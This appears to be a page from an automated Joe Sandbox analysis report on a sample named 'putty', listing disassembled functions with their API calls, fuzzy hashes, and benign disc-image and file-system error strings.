Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free_malloc$AllocateHeap_memset
String ID: Out of Memory$Row has too many bytes to allocate in memory
API String ID: 4266565421-1898397422
Opcode ID: 728346af4725cc0005c27910bc28e89de61a5d39e2977f70d0ac4d19caf6a3a8
Instruction ID: 7db4954aaab411f2a9d2d29eeef8d8745fa4c245f6d9e80690b0acbf0cdcfa99
Opcode Fuzzy Hash: 728346af4725cc0005c27910bc28e89de61a5d39e2977f70d0ac4d19caf6a3a8
Instruction Fuzzy Hash: C43125B1A12B0147C7A3AA369D51BFB72D86F51300F05092DEA9BCE700EB35FA01C662

Function 003391E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0033920C
std::_Lockit::_Lockit.LIBCPMT ref: 0033922F
std::bad_exception::bad_exception.LIBCMT ref: 003392B0
__CxxThrowException@8.LIBCMT ref: 003392BE
std::_Lockit::_Lockit.LIBCPMT ref: 003392D1
std::locale::facet::_Facet_Register.LIBCPMT ref: 003392EB

Strings

bad cast, xrefs: 003392A8

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: d62e7ac445f78d57b5365cd270e09c1e5348f30a7a5d4e9332b083bb193bfb7b
Instruction ID: f1630e3ac5ea990df1f4d0971d9ffeebcb566aa8b0e8894d3de2b1be3c43381f
Opcode Fuzzy Hash: d62e7ac445f78d57b5365cd270e09c1e5348f30a7a5d4e9332b083bb193bfb7b
Instruction Fuzzy Hash: 9E31B731D00605EFCB16EF54D8C1BEEB3B8EB14724F11466AEA16A76D1DBB06D04CB91

Function 0032D580 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0032D5AC
std::_Lockit::_Lockit.LIBCPMT ref: 0032D5CF
std::bad_exception::bad_exception.LIBCMT ref: 0032D650
__CxxThrowException@8.LIBCMT ref: 0032D65E
std::_Lockit::_Lockit.LIBCPMT ref: 0032D671
std::locale::facet::_Facet_Register.LIBCPMT ref: 0032D68B

Strings

bad cast, xrefs: 0032D648

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 8a00de62cdaaa2aad8fba3118a2eba53d6c29c10e089e2906b6545a607c47e92
Instruction ID: de779436f4443466ee6a826f3e809bb75e115712283881e483e3a34483f9cf2e
Opcode Fuzzy Hash: 8a00de62cdaaa2aad8fba3118a2eba53d6c29c10e089e2906b6545a607c47e92
Instruction Fuzzy Hash: 0B312431C00221DFCB12EF54E941BEEB7B8FB14324F55422AE61AAB6D1DB746D04CB91

Function 00322A20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000020,00000000,D747BB9A,?,?,?,0032234B,?,D747BB9A), ref: 00322A69
GetFileSize.KERNEL32(00000000,?,?,?,?,0032234B,?,D747BB9A), ref: 00322A87
GetLastError.KERNEL32(?,?,?,0032234B,?,D747BB9A), ref: 00322A95
CloseHandle.KERNEL32(00000000,?,?,?,0032234B,?,D747BB9A), ref: 00322AA2
CloseHandle.KERNEL32(00000000,?,?,?,0032234B,?,D747BB9A), ref: 00322AD2

Strings

K#2, xrefs: 00322ABB
Error querying size of file "%s": , xrefs: 00322ABF

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CloseFileHandle$CreateErrorLastSize
String ID: Error querying size of file "%s": $K#2
API String ID: 628521544-380526962
Opcode ID: 8fb881329da5b82445a10276fe5e5ae0619c3f9938393d5369969f87ed615082
Instruction ID: 35b331df8a53addd0e62879654986f7cdc612b7651ee9ae5dd0b30a7060bcb93
Opcode Fuzzy Hash: 8fb881329da5b82445a10276fe5e5ae0619c3f9938393d5369969f87ed615082
Instruction Fuzzy Hash: D1214471A01214AFCB11DFA9EC85A9EB7FCFB4D720F11066AF911E7391CB349D008AA0

Function 00322FE0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69memorystringwindowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,0000002E,00000400,003ECB54,00000000,00000000,00000000,003234DB), ref: 00323003
lstrlenW.KERNEL32(00000000), ref: 00323010
LocalAlloc.KERNEL32(00000000,00000040), ref: 00323047
swprintf.LIBCMT ref: 0032307B
swprintf.LIBCMT ref: 00323090

Strings

Unknown error 0x%0lX, xrefs: 00323088
IDispatch error #%d, xrefs: 00323073

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: swprintf$AllocFormatLocalMessagelstrlen
String ID: IDispatch error #%d$Unknown error 0x%0lX
API String ID: 1134423501-2934499512
Opcode ID: 4748414a0912dacefa42b887b3a3553cb45003fa0898faff48ac555f9142e4bf
Instruction ID: 14f1e5d03a67bb3f8a685ac00393e9285f719d69378017e38f1bd76649f9cb31
Opcode Fuzzy Hash: 4748414a0912dacefa42b887b3a3553cb45003fa0898faff48ac555f9142e4bf
Instruction Fuzzy Hash: 9421A270600720ABE721DB28FC46FA573A6EF94714F21845CF1869B1C4D7B6FA42CBA4

Function 00330550 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_rand.LIBCMT ref: 003305A0

Part of subcall function 003BA61A: __getptd.LIBCMT ref: 003BA61A

_memset.LIBCMT ref: 003305C5

Strings

E, xrefs: 00330592
0, xrefs: 00330561
OSTA Compressed Unicode, xrefs: 00330560
C, xrefs: 0033058B
A, xrefs: 00330584

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: __getptd_memset_rand
String ID: 0$A$C$E$OSTA Compressed Unicode
API String ID: 2917338736-814400126
Opcode ID: 1d4ed1ad617ffaf1990120adca09cfe31877d58749d9b9ea95b532b2bc4e9529
Instruction ID: 2227654a6076d705af7839d0daaba0d02858c25eeb656578216b31045ef43539
Opcode Fuzzy Hash: 1d4ed1ad617ffaf1990120adca09cfe31877d58749d9b9ea95b532b2bc4e9529
Instruction Fuzzy Hash: 0E1129748182198ADB0BDFB894593DEBBE0FB09304F904169C850AB342D7B51609CB99

Function 0033A760 Relevance: 12.2, APIs: 1, Strings: 7, Instructions: 200COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0033A817

Strings

error: unable to read VIDEO_TS.IFO VMG data., xrefs: 0033A8A0
error: VIDEO_TS.IFO is not of VMG format., xrefs: 0033A85A
error: unable to locate VIDEO_TS.IFO in file tree., xrefs: 0033A7BD
error: unable to obtain necessary information from DVD-Video files., xrefs: 0033A995
error: unable to obtain necessary information from VIDEO_TS.* files., xrefs: 0033A964
/VIDEO_TS/VIDEO_TS.IFO, xrefs: 0033A7A2
error: unable to open and identify VIDEO_TS.IFO., xrefs: 0033A7FE

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CloseHandle
String ID: /VIDEO_TS/VIDEO_TS.IFO$error: VIDEO_TS.IFO is not of VMG format.$error: unable to locate VIDEO_TS.IFO in file tree.$error: unable to obtain necessary information from DVD-Video files.$error: unable to obtain necessary information from VIDEO_TS.* files.$error: unable to open and identify VIDEO_TS.IFO.$error: unable to read VIDEO_TS.IFO VMG data.
API String ID: 2962429428-79772414
Opcode ID: 300277e6e02d3b26586528e01a39498a1d5207a08c1a45e26447d2883d3f6ca3
Instruction ID: d4ee97672a24228cdad1e0c6f5c76c8e873d2de7d2037d7b166d68bd1478eda2
Opcode Fuzzy Hash: 300277e6e02d3b26586528e01a39498a1d5207a08c1a45e26447d2883d3f6ca3
Instruction Fuzzy Hash: 37718D716087019BC716DF24D8C2AABB7E4BF89700F11492DF585AB251DB35ED0ACB93

Function 0032D280 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0032D2B1
std::_Xinvalid_argument.LIBCPMT ref: 0032D2D2
std::_Xinvalid_argument.LIBCPMT ref: 0032D3EC

Strings

invalid string position, xrefs: 0032D3E7
string too long, xrefs: 0032D2AC, 0032D2CD

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 909987262-4289949731
Opcode ID: 08d20471d43b60cbd3dc83fe716c4037851d70ca122e5de7bb12c22380cbea8d
Instruction ID: 0cad1844083b3eaba6b6128f3bf106187be91ff13e31a7b2fc357c638fbe7f62
Opcode Fuzzy Hash: 08d20471d43b60cbd3dc83fe716c4037851d70ca122e5de7bb12c22380cbea8d
Instruction Fuzzy Hash: 3041C3357142209B8726DE59F8C086EB3EAFFD57103204A6DF682DB650DB70EC05C7A2

Function 0032A5B0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0032A619

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

__CxxThrowException@8.LIBCMT ref: 0032A6A9

Strings

The file ", xrefs: 0032A65A
" may have been modified during file system creation, please close all applications accessing the file and try again., xrefs: 0032A649
The file "%s" may have been modified during file system creation, please verify its integrity on the disc., xrefs: 0032A6C7
warning: conflicting file sizes in "%s"., xrefs: 0032A6EC

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: " may have been modified during file system creation, please close all applications accessing the file and try again.$The file "$The file "%s" may have been modified during file system creation, please verify its integrity on the disc.$warning: conflicting file sizes in "%s".
API String ID: 3476068407-3454040205
Opcode ID: ad5cfca359c13da274bffcaf020379f89b55f34772b41a1080423558beb223da
Instruction ID: 64ee37e7681805ff3a12404c77388a8fca88582321b5dd2e8fad48fc77355b95
Opcode Fuzzy Hash: ad5cfca359c13da274bffcaf020379f89b55f34772b41a1080423558beb223da
Instruction Fuzzy Hash: 1C51A471A007149FCB25DFA8EC85BDEB7B4EF48304F044659E519AB291DB70AE48CB91

Function 0032F228 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 157COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0032F23C

Strings

/, xrefs: 0032F28D
%, xrefs: 0032F283
Length of root directory extent: %u., xrefs: 0032F339
Error: Failed to read directory entry at sector: %u., xrefs: 0032F48C
Location of root directory extent: %u., xrefs: 0032F326

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset
String ID: Error: Failed to read directory entry at sector: %u.$ Length of root directory extent: %u.$ Location of root directory extent: %u.$%$/
API String ID: 2102423945-3053257082
Opcode ID: 4a2801658489ed91a55b07f8c5a104ab39c36aada6c5f261822d6abd7257672d
Instruction ID: 7c5fd8e7ddf256b06027d0db426654d05258968c9149bb481330e61a245df032
Opcode Fuzzy Hash: 4a2801658489ed91a55b07f8c5a104ab39c36aada6c5f261822d6abd7257672d
Instruction Fuzzy Hash: 375108755083D08FD739DB29D881BABBBE5AFC9300F05893EF1D987281DA745905CBA2

Function 003313C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003313F6
GetTimeZoneInformation.KERNEL32(?,CCCCCCC3,?,CCCCCCEB), ref: 00331451
_memset.LIBCMT ref: 003314E1
_memset.LIBCMT ref: 0033150B

Strings

OSTA Compressed Unicode, xrefs: 003314F1, 00331521
*OSTA UDF Compliant, xrefs: 00331559

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset$InformationTimeZone
String ID: *OSTA UDF Compliant$OSTA Compressed Unicode
API String ID: 2117168152-2309661426
Opcode ID: 610227c69bdf588c54bd881f79623556c76153fa46ec6d66126c0a3f26dce1b8
Instruction ID: 1850dfb5a7df6ae220252e10e7c5a3d86c5b1bd9fed73dc960f458d39f18ae7a
Opcode Fuzzy Hash: 610227c69bdf588c54bd881f79623556c76153fa46ec6d66126c0a3f26dce1b8
Instruction Fuzzy Hash: 4F615975D053598ACB21CFA8C890BEEFBB5AF58304F0085EAD95CAB342D7705A84CF90

Function 00344E09 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 117COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00344F02

Strings

Call to NULL read function, xrefs: 00344F78
TADI, xrefs: 00344E36
Extra compressed data, xrefs: 00344FA4
Not enough image data, xrefs: 00344F6D
sequential row overflow, xrefs: 00344F62

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmove
String ID: Call to NULL read function$Extra compressed data$Not enough image data$TADI$sequential row overflow
API String ID: 4104443479-864566496
Opcode ID: ff2258dfc02c4effadf95bf2818308a508fb3b440e46be53ceba83dad3b0cfa9
Instruction ID: 2647c73e77152b24992c8768a7b84fd5c36d7518010ef5580367990f7b93c51d
Opcode Fuzzy Hash: ff2258dfc02c4effadf95bf2818308a508fb3b440e46be53ceba83dad3b0cfa9
Instruction Fuzzy Hash: D7418C70900B448BDB339A30D8857FBB3E5BF54304F04482DEAE78A252DB70B989CB52

Function 003D4C53 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PMDtoOffset.LIBCMT ref: 003D4D27
std::bad_exception::bad_exception.LIBCMT ref: 003D4D51
__CxxThrowException@8.LIBCMT ref: 003D4D5F

Strings

Bad dynamic_cast!, xrefs: 003D4D49

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8OffsetThrowstd::bad_exception::bad_exception
String ID: Bad dynamic_cast!
API String ID: 1176828985-2956939130
Opcode ID: 7436413f6266081cf55c7c212b6830623cb2945a16c0ee73c071ee82e98c0ba3
Instruction ID: 95e70829ad9ce7871ade7b3fbbb0e357410603f163d9fa62ce3530cc102d698f
Opcode Fuzzy Hash: 7436413f6266081cf55c7c212b6830623cb2945a16c0ee73c071ee82e98c0ba3
Instruction Fuzzy Hash: 1C31D677A016159FCF06DF68E885AAE77A5AF08311F21445AF901EB792D734ED01CBA0

Function 00321CE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00321CF6

Part of subcall function 003B79B5: std::exception::exception.LIBCMT ref: 003B79CA
Part of subcall function 003B79B5: __CxxThrowException@8.LIBCMT ref: 003B79DF

std::_Xinvalid_argument.LIBCPMT ref: 00321D0C
std::_Xinvalid_argument.LIBCPMT ref: 00321D2A
